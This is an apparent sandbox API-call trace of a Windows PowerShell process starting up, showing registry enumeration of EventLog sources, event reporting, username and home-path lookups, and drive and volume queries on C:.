	[0202.966] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x358) returned 0x0
	[0202.966] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x35c) returned 0x0
	[0202.966] RegCloseKey (hKey=0x35c) returned 0x0
	[0202.966] RegCloseKey (hKey=0x338) returned 0x0
	[0202.966] RegCloseKey (hKey=0x358) returned 0x0
	[0202.967] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd2d8 | out: phkResult=0xbd2d8*=0x358) returned 0x0
	[0202.967] RegQueryInfoKeyW (in: hKey=0x358, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xbd24c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xbd248, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xbd24c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xbd248*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0202.967] CoTaskMemFree (pv=0x0) 
	[0202.967] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0202.967] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x0, lpName=0x32d910, lpcchName=0xbd2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xbd2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0202.967] CoTaskMemFree (pv=0x32d910) 
	[0202.967] CoTaskMemFree (pv=0x0) 
	[0202.967] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0202.967] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x1, lpName=0x32d910, lpcchName=0xbd2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xbd2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0202.967] CoTaskMemFree (pv=0x32d910) 
	[0202.967] CoTaskMemFree (pv=0x0) 
	[0202.967] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0202.967] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x2, lpName=0x32d910, lpcchName=0xbd2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xbd2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0202.967] CoTaskMemFree (pv=0x32d910) 
	[0202.968] CoTaskMemFree (pv=0x0) 
	[0202.968] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0202.968] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x3, lpName=0x32d910, lpcchName=0xbd2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xbd2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0202.968] CoTaskMemFree (pv=0x32d910) 
	[0202.968] CoTaskMemFree (pv=0x0) 
	[0202.968] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0202.968] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x4, lpName=0x32d910, lpcchName=0xbd2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xbd2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0202.968] CoTaskMemFree (pv=0x32d910) 
	[0202.968] CoTaskMemFree (pv=0x0) 
	[0202.968] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0202.968] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x5, lpName=0x32d910, lpcchName=0xbd2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xbd2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0202.968] CoTaskMemFree (pv=0x32d910) 
	[0202.968] CoTaskMemFree (pv=0x0) 
	[0202.968] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0202.968] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x6, lpName=0x32d910, lpcchName=0xbd2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xbd2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0202.968] CoTaskMemFree (pv=0x32d910) 
	[0202.968] CoTaskMemFree (pv=0x0) 
	[0202.968] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0202.968] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x7, lpName=0x32d910, lpcchName=0xbd2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xbd2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0202.968] CoTaskMemFree (pv=0x32d910) 
	[0202.968] CoTaskMemFree (pv=0x0) 
	[0202.968] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0202.968] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x8, lpName=0x32d910, lpcchName=0xbd2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xbd2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0202.968] CoTaskMemFree (pv=0x32d910) 
	[0202.968] CoTaskMemFree (pv=0x0) 
	[0202.968] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x338) returned 0x0
	[0202.968] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x0) returned 0x2
	[0202.968] RegOpenKeyExW (in: hKey=0x358, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x35c) returned 0x0
	[0202.969] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x0) returned 0x2
	[0202.969] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x360) returned 0x0
	[0202.969] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x0) returned 0x2
	[0202.969] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x364) returned 0x0
	[0202.969] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x0) returned 0x2
	[0202.969] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x368) returned 0x0
	[0202.969] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x0) returned 0x2
	[0202.969] RegOpenKeyExW (in: hKey=0x358, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x36c) returned 0x0
	[0202.969] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x0) returned 0x2
	[0202.969] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x0) returned 0x5
	[0203.061] RegOpenKeyExW (in: hKey=0x358, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x370) returned 0x0
	[0203.061] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x0) returned 0x2
	[0203.061] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x374) returned 0x0
	[0203.061] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x378) returned 0x0
	[0203.062] RegCloseKey (hKey=0x378) returned 0x0
	[0203.062] RegCloseKey (hKey=0x358) returned 0x0
	[0203.062] RegCloseKey (hKey=0x374) returned 0x0
	[0203.063] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd2a8 | out: phkResult=0xbd2a8*=0x374) returned 0x0
	[0203.063] RegQueryInfoKeyW (in: hKey=0x374, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xbd21c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xbd218, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xbd21c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xbd218*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.064] CoTaskMemFree (pv=0x0) 
	[0203.064] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0203.064] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x0, lpName=0x32d910, lpcchName=0xbd2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xbd2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.064] CoTaskMemFree (pv=0x32d910) 
	[0203.064] CoTaskMemFree (pv=0x0) 
	[0203.064] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0203.064] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x1, lpName=0x32d910, lpcchName=0xbd2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xbd2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.064] CoTaskMemFree (pv=0x32d910) 
	[0203.064] CoTaskMemFree (pv=0x0) 
	[0203.064] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0203.064] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x2, lpName=0x32d910, lpcchName=0xbd2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xbd2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.064] CoTaskMemFree (pv=0x32d910) 
	[0203.064] CoTaskMemFree (pv=0x0) 
	[0203.064] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0203.064] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x3, lpName=0x32d910, lpcchName=0xbd2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xbd2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.064] CoTaskMemFree (pv=0x32d910) 
	[0203.064] CoTaskMemFree (pv=0x0) 
	[0203.064] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0203.064] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x4, lpName=0x32d910, lpcchName=0xbd2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xbd2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.064] CoTaskMemFree (pv=0x32d910) 
	[0203.064] CoTaskMemFree (pv=0x0) 
	[0203.064] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0203.064] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x5, lpName=0x32d910, lpcchName=0xbd2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xbd2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.064] CoTaskMemFree (pv=0x32d910) 
	[0203.064] CoTaskMemFree (pv=0x0) 
	[0203.064] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0203.064] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x6, lpName=0x32d910, lpcchName=0xbd2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xbd2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.064] CoTaskMemFree (pv=0x32d910) 
	[0203.064] CoTaskMemFree (pv=0x0) 
	[0203.064] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0203.064] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x7, lpName=0x32d910, lpcchName=0xbd2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xbd2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.065] CoTaskMemFree (pv=0x32d910) 
	[0203.065] CoTaskMemFree (pv=0x0) 
	[0203.065] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0203.065] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x8, lpName=0x32d910, lpcchName=0xbd2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xbd2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.065] CoTaskMemFree (pv=0x32d910) 
	[0203.065] CoTaskMemFree (pv=0x0) 
	[0203.065] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd308 | out: phkResult=0xbd308*=0x358) returned 0x0
	[0203.065] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd308 | out: phkResult=0xbd308*=0x0) returned 0x2
	[0203.065] RegOpenKeyExW (in: hKey=0x374, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd308 | out: phkResult=0xbd308*=0x378) returned 0x0
	[0203.065] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd308 | out: phkResult=0xbd308*=0x0) returned 0x2
	[0203.065] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd308 | out: phkResult=0xbd308*=0x37c) returned 0x0
	[0203.065] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd308 | out: phkResult=0xbd308*=0x0) returned 0x2
	[0203.065] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd308 | out: phkResult=0xbd308*=0x380) returned 0x0
	[0203.065] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd308 | out: phkResult=0xbd308*=0x0) returned 0x2
	[0203.065] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd308 | out: phkResult=0xbd308*=0x384) returned 0x0
	[0203.065] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd308 | out: phkResult=0xbd308*=0x0) returned 0x2
	[0203.065] RegOpenKeyExW (in: hKey=0x374, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd308 | out: phkResult=0xbd308*=0x388) returned 0x0
	[0203.066] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd308 | out: phkResult=0xbd308*=0x0) returned 0x2
	[0203.066] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd308 | out: phkResult=0xbd308*=0x0) returned 0x5
	[0203.075] RegOpenKeyExW (in: hKey=0x374, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd308 | out: phkResult=0xbd308*=0x38c) returned 0x0
	[0203.076] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd308 | out: phkResult=0xbd308*=0x0) returned 0x2
	[0203.076] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd308 | out: phkResult=0xbd308*=0x390) returned 0x0
	[0203.076] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd308 | out: phkResult=0xbd308*=0x394) returned 0x0
	[0203.076] RegCloseKey (hKey=0x394) returned 0x0
	[0203.076] RegCloseKey (hKey=0x374) returned 0x0
	[0203.076] RegCloseKey (hKey=0x390) returned 0x0
	[0203.371] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b920008
	[0203.377] ReportEventW (hEventLog=0x1b920008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fab878*="WSMan", lpRawData=0x2fab5e8) returned 1
	[0203.516] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0203.516] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0203.516] CoTaskMemFree (pv=0x2e4100) 
	[0203.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0203.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbcd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0203.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbcd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0203.533] CoTaskMemAlloc (cb=0x804) returned 0x1b795b80
	[0203.533] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b795b80, nSize=0xbd598 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xbd598) returned 0x1
	[0203.538] CoTaskMemFree (pv=0x1b795b80) 
	[0203.538] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0203.538] GetUserNameW (in: lpBuffer=0x32d910, pcbBuffer=0xbd5d8 | out: lpBuffer="aETAdzjz", pcbBuffer=0xbd5d8) returned 1
	[0203.541] CoTaskMemFree (pv=0x32d910) 
	[0203.542] ReportEventW (hEventLog=0x1b920008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e037e0*="Alias", lpRawData=0x2e03570) returned 1
	[0203.986] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0203.986] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0203.986] CoTaskMemFree (pv=0x2e4100) 
	[0203.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0203.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbcd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0203.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbcd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0203.988] CoTaskMemAlloc (cb=0x804) returned 0x1b795b80
	[0203.988] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b795b80, nSize=0xbd598 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xbd598) returned 0x1
	[0203.988] CoTaskMemFree (pv=0x1b795b80) 
	[0203.988] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0203.988] GetUserNameW (in: lpBuffer=0x32d910, pcbBuffer=0xbd5d8 | out: lpBuffer="aETAdzjz", pcbBuffer=0xbd5d8) returned 1
	[0203.988] CoTaskMemFree (pv=0x32d910) 
	[0203.988] ReportEventW (hEventLog=0x1b920008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e08d88*="Environment", lpRawData=0x2e08b18) returned 1
	[0203.997] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0203.997] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0203.997] CoTaskMemFree (pv=0x2e4100) 
	[0203.998] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0203.998] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0203.998] CoTaskMemFree (pv=0x2e4100) 
	[0203.998] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0203.998] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0203.998] CoTaskMemFree (pv=0x2e4100) 
	[0203.998] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0xbd140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0203.998] SetErrorMode (uMode=0x1) returned 0x1
	[0203.999] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0xbd350 | out: lpFileInformation=0xbd350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0203.999] SetErrorMode (uMode=0x1) returned 0x1
	[0204.002] GetLogicalDrives () returned 0x4
	[0204.010] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xbceb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0204.011] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0204.011] SetErrorMode (uMode=0x1) returned 0x1
	[0204.012] CoTaskMemAlloc (cb=0x68) returned 0x1b76f620
	[0204.012] CoTaskMemAlloc (cb=0x68) returned 0x1b76f690
	[0204.012] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b76f620, nVolumeNameSize=0x32, lpVolumeSerialNumber=0xbd320, lpMaximumComponentLength=0xbd31c, lpFileSystemFlags=0xbd318, lpFileSystemNameBuffer=0x1b76f690, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xbd320*=0x705ba84c, lpMaximumComponentLength=0xbd31c*=0xff, lpFileSystemFlags=0xbd318*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0204.012] CoTaskMemFree (pv=0x1b76f620) 
	[0204.012] CoTaskMemFree (pv=0x1b76f690) 
	[0204.012] SetErrorMode (uMode=0x1) returned 0x1
	[0204.013] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0204.014] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xbd060, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0204.014] SetErrorMode (uMode=0x1) returned 0x1
	[0204.014] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xbd2c0 | out: lpFileInformation=0xbd2c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0204.014] SetErrorMode (uMode=0x1) returned 0x1
	[0204.014] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xbd060, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0204.014] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xbcf10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0204.014] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0204.014] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xbce40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0204.014] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0204.015] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xbce90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0204.015] SetErrorMode (uMode=0x1) returned 0x1
